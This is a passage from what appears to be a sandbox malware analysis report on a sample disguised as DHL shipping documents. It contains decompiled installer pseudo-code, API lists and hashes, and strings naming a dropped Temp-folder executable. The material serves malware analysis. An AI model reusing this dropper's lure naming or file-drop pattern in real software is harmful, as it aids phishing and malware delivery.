                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                        					_push(1);
                        					E004045C4(_t167);
                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                        					_push(0x14);
                        					E004045C4(_t167);
                        					E004045F9(_t166);
                        					_t138 = E00406A35(8);
                        					if(_t138 == 0) {
                        						L53:
                        						return E0040462B(_a8, _a12, _a16);
                        					} else {
                        						 *_t138(_t166, 1);
                        						goto L8;
                        					}
                        				}
                        			}

                        APIs
                        • GetDlgItem.USER32 ref: 00404B04
                        • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                        • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                        • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00423748,00000000,?,?), ref: 00404C1C
                        • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m), ref: 00404C28
                        • SetDlgItemTextW.USER32 ref: 00404C3A
                          • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                          • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                          • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                          • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                          • Part of subcall function 004068EF: CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                        • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                          • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                          • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                          • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$A$C:\Users\user\AppData\Local\Temp$H7B
                        • API String ID: 2624150263-3761163765
                        • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                        • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                        • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                        • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E004021AA() {
                        				signed int _t52;
                        				void* _t56;
                        				intOrPtr* _t60;
                        				intOrPtr _t61;
                        				intOrPtr* _t62;
                        				intOrPtr* _t64;
                        				intOrPtr* _t66;
                        				intOrPtr* _t68;
                        				intOrPtr* _t70;
                        				intOrPtr* _t72;
                        				intOrPtr* _t74;
                        				intOrPtr* _t76;
                        				intOrPtr* _t78;
                        				intOrPtr* _t80;
                        				void* _t83;
                        				intOrPtr* _t91;
                        				signed int _t101;
                        				signed int _t105;
                        				void* _t107;
                        
                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                        				_t52 =  *(_t107 - 0x20);
                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                        				_t101 = _t52 & 0x00008000;
                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                        				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                        					E00402DA6(0x21);
                        				}
                        				_t56 = _t107 + 8;
                        				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                        				if(_t56 < _t83) {
                        					L14:
                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                        					_push(0xfffffff0);
                        				} else {
                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                        					if(_t61 >= _t83) {
                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                        						if(_t101 == _t83) {
                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
                        						}
                        						if(_t105 != _t83) {
                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                        						}
                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                        						if( *_t91 != _t83) {
                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                        						}
                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                        						}
                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                        					}
                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        						_push(0xfffffff4);
                        					} else {
                        						goto L14;
                        					}
                        				}
                        				E00401423();
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                        				return 0;
                        			}

                        APIs
                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CreateInstance
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 542301482-501415292
                        • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                        • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                        • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                        • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E0040290B(short __ebx, short* __edi) {
                        				void* _t21;
                        
                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                        					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                        					_push(_t21 - 0x2b0);
                        					_push(__edi);
                        					E00406668();
                        				} else {
                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                        					 *__edi = __ebx;
                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                        				}
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                        				return 0;
                        			}

                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                        • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                        • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                        • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                        				struct HWND__* _v8;
                        				struct HWND__* _v12;
                        				long _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				signed char* _v32;
                        				int _v36;
                        				signed int _v44;
                        				int _v48;
                        				signed int* _v60;
                        				signed char* _v64;
                        				signed int _v68;
                        				long _v72;
                        				void* _v76;
                        				intOrPtr _v80;
                        				intOrPtr _v84;
                        				void* _v88;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t198;
                        				intOrPtr _t201;
                        				long _t207;
                        				signed int _t211;
                        				signed int _t222;
                        				void* _t225;
                        				void* _t226;
                        				int _t232;
                        				long _t237;
                        				long _t238;
                        				signed int _t239;
                        				signed int _t245;
                        				signed int _t247;
                        				signed char _t248;
                        				signed char _t254;
                        				void* _t258;
                        				void* _t260;
                        				signed char* _t278;
                        				signed char _t279;
                        				long _t284;
                        				struct HWND__* _t291;
                        				signed int* _t292;
                        				int _t293;
                        				long _t294;
                        				signed int _t295;
                        				void* _t297;
                        				long _t298;
                        				int _t299;
                        				signed int _t300;
                        				signed int _t303;
                        				signed int _t311;
                        				signed char* _t319;
                        				int _t324;
                        				void* _t326;
                        
                        				_t291 = _a4;
                        				_v12 = GetDlgItem(_t291, 0x3f9);
                        				_v8 = GetDlgItem(_t291, 0x408);
                        				_t326 = SendMessageW;
                        				_v24 =  *0x42a288;
                        				_v28 =  *0x42a270 + 0x94;
                        				if(_a8 != 0x110) {
                        					L23:
                        					if(_a8 != 0x405) {
                        						_t301 = _a16;
                        					} else {
                        						_a12 = 0;
                        						_t301 = 1;
                        						_a8 = 0x40f;
                        						_a16 = 1;
                        					}
                        					if(_a8 == 0x4e || _a8 == 0x413) {
                        						_v16 = _t301;
                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                        							if(( *0x42a279 & 0x00000002) != 0) {
                        								L41:
                        								if(_v16 != 0) {
                        									_t237 = _v16;
                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                        									}
                        									_t238 = _v16;
                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                        										_t301 = _v24;
                        										_t239 =  *(_t238 + 0x5c);
                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                        										} else {
                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                        										}
                        									}
                        								}
                        								goto L48;
                        							}
                        							if(_a8 == 0x413) {
                        								L33:
                        								_t301 = 0 | _a8 != 0x00000413;
                        								_t245 = E00404F7F(_v8, _a8 != 0x413);
                        								_t295 = _t245;
                        								if(_t295 >= 0) {
                        									_t94 = _v24 + 8; // 0x8
                        									_t301 = _t245 * 0x818 + _t94;
                        									_t247 =  *_t301;
                        									if((_t247 & 0x00000010) == 0) {
                        										if((_t247 & 0x00000040) == 0) {
                        											_t248 = _t247 ^ 0x00000001;
                        										} else {
                        											_t254 = _t247 ^ 0x00000080;
                        											if(_t254 >= 0) {
                        												_t248 = _t254 & 0x000000fe;
                        											} else {
                        												_t248 = _t254 | 0x00000001;
                        											}
                        										}
                        										 *_t301 = _t248;
                        										E0040117D(_t295);
                        										_a12 = _t295 + 1;
                        										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                        										_a8 = 0x40f;
                        									}
                        								}
                        								goto L41;
                        							}
                        							_t301 = _a16;
                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                        								goto L41;
                        							}
                        							goto L33;
                        						} else {
                        							goto L48;
                        						}
                        					} else {
                        						L48:
                        						if(_a8 != 0x111) {
                        							L56:
                        							if(_a8 == 0x200) {
                        								SendMessageW(_v8, 0x200, 0, 0);
                        							}
                        							if(_a8 == 0x40b) {
                        								_t225 =  *0x42372c;
                        								if(_t225 != 0) {
                        									ImageList_Destroy(_t225);
                        								}
                        								_t226 =  *0x423740;
                        								if(_t226 != 0) {
                        									GlobalFree(_t226);
                        								}
                        								 *0x42372c = 0;
                        								 *0x423740 = 0;
                        								 *0x42a2c0 = 0;
                        							}
                        							if(_a8 != 0x40f) {
                        								L90:
                        								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                        									ShowWindow(_v8, _t324);
                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                        								}
                        								goto L93;
                        							} else {
                        								E004011EF(_t301, 0, 0);
                        								_t198 = _a12;
                        								if(_t198 != 0) {
                        									if(_t198 != 0xffffffff) {
                        										_t198 = _t198 - 1;
                        									}
                        									_push(_t198);
                        									_push(8);
                        									E00404FFF();
                        								}
                        								if(_a16 == 0) {
                        									L75:
                        									E004011EF(_t301, 0, 0);
                        									_v36 =  *0x423740;
                        									_t201 =  *0x42a288;
                        									_v64 = 0xf030;
                        									_v24 = 0;
                        									if( *0x42a28c <= 0) {
                        										L86:
                        										if( *0x42a31e == 0x400) {
                        											InvalidateRect(_v8, 0, 1);
                        										}
                        										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                        											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                        										}
                        										goto L90;
                        									}
                        									_t292 = _t201 + 8;
                        									do {
                        										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                        										if(_t207 != 0) {
                        											_t303 =  *_t292;
                        											_v72 = _t207;
                        											_v76 = 8;
                        											if((_t303 & 0x00000001) != 0) {
                        												_v76 = 9;
                        												_v60 =  &(_t292[4]);
                        												_t292[0] = _t292[0] & 0x000000fe;
                        											}
                        											if((_t303 & 0x00000040) == 0) {
                        												_t211 = (_t303 & 0x00000001) + 1;
                        												if((_t303 & 0x00000010) != 0) {
                        													_t211 = _t211 + 3;
                        												}
                        											} else {
                        												_t211 = 3;
                        											}
                        											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                        											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                        											SendMessageW(_v8, 0x113f, 0,  &_v76);
                        										}
                        										_v24 = _v24 + 1;
                        										_t292 =  &(_t292[0x206]);
                        									} while (_v24 <  *0x42a28c);
                        									goto L86;
                        								} else {
                        									_t293 = E004012E2( *0x423740);
                        									E00401299(_t293);
                        									_t222 = 0;
                        									_t301 = 0;
                        									if(_t293 <= 0) {
                        										L74:
                        										SendMessageW(_v12, 0x14e, _t301, 0);
                        										_a16 = _t293;
                        										_a8 = 0x420;
                        										goto L75;
                        									} else {
                        										goto L71;
                        									}
                        									do {
                        										L71:
                        										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                        											_t301 = _t301 + 1;
                        										}
                        										_t222 = _t222 + 1;
                        									} while (_t222 < _t293);
                        									goto L74;
                        								}
                        							}
                        						}
                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                        							goto L93;
                        						} else {
                        							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                        							if(_t232 == 0xffffffff) {
                        								goto L93;
                        							}
                        							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                        							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                        								_t294 = 0x20;
                        							}
                        							E00401299(_t294);
                        							SendMessageW(_a4, 0x420, 0, _t294);
                        							_a12 = _a12 | 0xffffffff;
                        							_a16 = 0;
                        							_a8 = 0x40f;
                        							goto L56;
                        						}
                        					}
                        				} else {
                        					_v36 = 0;
                        					_v20 = 2;
                        					 *0x42a2c0 = _t291;
                        					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                        					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                        					 *0x423734 =  *0x423734 | 0xffffffff;
                        					_t297 = _t258;
                        					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                        					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                        					 *0x42372c = _t260;
                        					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                        					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                        					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                        						SendMessageW(_v8, 0x111b, 0x10, 0);
                        					}
                        					DeleteObject(_t297);
                        					_t298 = 0;
                        					do {
                        						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                        						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                        							if(_t298 != 0x20) {
                        								_v20 = 0;
                        							}
                        							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                        						}
                        						_t298 = _t298 + 1;
                        					} while (_t298 < 0x21);
                        					_t299 = _a16;
                        					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                        					_push(0x15);
                        					E004045C4(_a4);
                        					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                        					_push(0x16);
                        					E004045C4(_a4);
                        					_t300 = 0;
                        					_v16 = 0;
                        					if( *0x42a28c <= 0) {
                        						L19:
                        						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                        						goto L20;
                        					} else {
                        						_t319 = _v24 + 8;
                        						_v32 = _t319;
                        						do {
                        							_t278 =  &(_t319[0x10]);
                        							if( *_t278 != 0) {
                        								_v64 = _t278;
                        								_t279 =  *_t319;
                        								_v88 = _v16;
                        								_t311 = 0x20;
                        								_v84 = 0xffff0002;
                        								_v80 = 0xd;
                        								_v68 = _t311;
                        								_v44 = _t300;
                        								_v72 = _t279 & _t311;
                        								if((_t279 & 0x00000002) == 0) {
                        									if((_t279 & 0x00000004) == 0) {
                        										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									} else {
                        										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                        									}
                        								} else {
                        									_v80 = 0x4d;
                        									_v48 = 1;
                        									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                        									_v36 = 1;
                        									 *( *0x423740 + _t300 * 4) = _t284;
                        									_v16 =  *( *0x423740 + _t300 * 4);
                        								}
                        							}
                        							_t300 = _t300 + 1;
                        							_t319 =  &(_v32[0x818]);
                        							_v32 = _t319;
                        						} while (_t300 <  *0x42a28c);
                        						if(_v36 != 0) {
                        							L20:
                        							if(_v20 != 0) {
                        								E004045F9(_v8);
                        								goto L23;
                        							} else {
                        								ShowWindow(_v12, 5);
                        								E004045F9(_v12);
                        								L93:
                        								return E0040462B(_a8, _a12, _a16);
                        							}
                        						}
                        						goto L19;
                        					}
                        				}
                        			}
                        0x0040550a
                        0x00405511
                        0x00405514
                        0x004055b6
                        0x004055bf
                        0x004055c7
                        0x004055c7
                        0x004055d5
                        0x004055e6
                        0x004055e6
                        0x00000000
                        0x004055d5
                        0x0040551a
                        0x0040551d
                        0x00405523
                        0x00405528
                        0x0040552a
                        0x0040552c
                        0x00405532
                        0x00405539
                        0x0040553e
                        0x00405545
                        0x00405548
                        0x00405548
                        0x0040554f
                        0x0040555b
                        0x0040555f
                        0x00405561
                        0x00405561
                        0x00405551
                        0x00405553
                        0x00405553
                        0x00405581
                        0x0040558d
                        0x0040559c
                        0x0040559c
                        0x0040559e
                        0x004055a1
                        0x004055aa
                        0x00000000
                        0x004054b1
                        0x004054bc
                        0x004054bf
                        0x004054c4
                        0x004054c6
                        0x004054ca
                        0x004054da
                        0x004054e4
                        0x004054e6
                        0x004054e9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004054cc
                        0x004054cc
                        0x004054d2
                        0x004054d4
                        0x004054d4
                        0x004054d5
                        0x004054d6
                        0x00000000
                        0x004054cc
                        0x004054af
                        0x0040548a
                        0x004053cd
                        0x00000000
                        0x004053e3
                        0x004053ed
                        0x004053f2
                        0x00000000
                        0x00000000
                        0x00405404
                        0x00405409
                        0x00405415
                        0x00405415
                        0x00405417
                        0x00405426
                        0x00405428
                        0x0040542c
                        0x0040542f
                        0x00000000
                        0x0040542f
                        0x004053cd
                        0x00405083
                        0x00405088
                        0x00405091
                        0x00405098
                        0x004050aa
                        0x004050b5
                        0x004050bb
                        0x004050c9
                        0x004050dd
                        0x004050e2
                        0x004050ef
                        0x004050f4
                        0x0040510a
                        0x0040511b
                        0x00405128
                        0x00405128
                        0x0040512b
                        0x00405131
                        0x00405133
                        0x00405136
                        0x0040513b
                        0x00405140
                        0x00405142
                        0x00405142
                        0x00405162
                        0x00405162
                        0x00405164
                        0x00405165
                        0x0040516a
                        0x00405170
                        0x00405174
                        0x00405179
                        0x00405181
                        0x00405185
                        0x0040518a
                        0x0040518f
                        0x00405197
                        0x0040519a
                        0x0040526a
                        0x0040527d
                        0x00000000
                        0x004051a0
                        0x004051a3
                        0x004051a6
                        0x004051a9
                        0x004051a9
                        0x004051af
                        0x004051b8
                        0x004051bb
                        0x004051bf
                        0x004051c2
                        0x004051c5
                        0x004051ce
                        0x004051d7
                        0x004051da
                        0x004051dd
                        0x004051e0
                        0x0040521e
                        0x00405249
                        0x00405220
                        0x0040522f
                        0x0040522f
                        0x004051e2
                        0x004051e5
                        0x004051f3
                        0x004051fd
                        0x00405205
                        0x0040520c
                        0x00405217
                        0x00405217
                        0x004051e0
                        0x0040524f
                        0x00405250
                        0x0040525c
                        0x0040525c
                        0x00405268
                        0x00405283
                        0x00405286
                        0x004052a3
                        0x00000000
                        0x00405288
                        0x0040528d
                        0x00405296
                        0x00405629
                        0x0040563b
                        0x0040563b
                        0x00405286
                        0x00000000
                        0x00405268
                        0x0040519a

                        APIs
                        • GetDlgItem.USER32 ref: 00405049
                        • GetDlgItem.USER32 ref: 00405054
                        • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                        • LoadImageW.USER32 ref: 004050B5
                        • SetWindowLongW.USER32 ref: 004050CE
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                        • DeleteObject.GDI32(00000000), ref: 0040512B
                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                        • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                        • SetWindowLongW.USER32 ref: 0040527D
                        • ShowWindow.USER32(?,00000005), ref: 0040528D
                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                        • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                        • GlobalFree.KERNEL32 ref: 0040546B
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                        • ShowWindow.USER32(?,00000000), ref: 00405615
                        • GetDlgItem.USER32 ref: 00405620
                        • ShowWindow.USER32(00000000), ref: 00405627
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
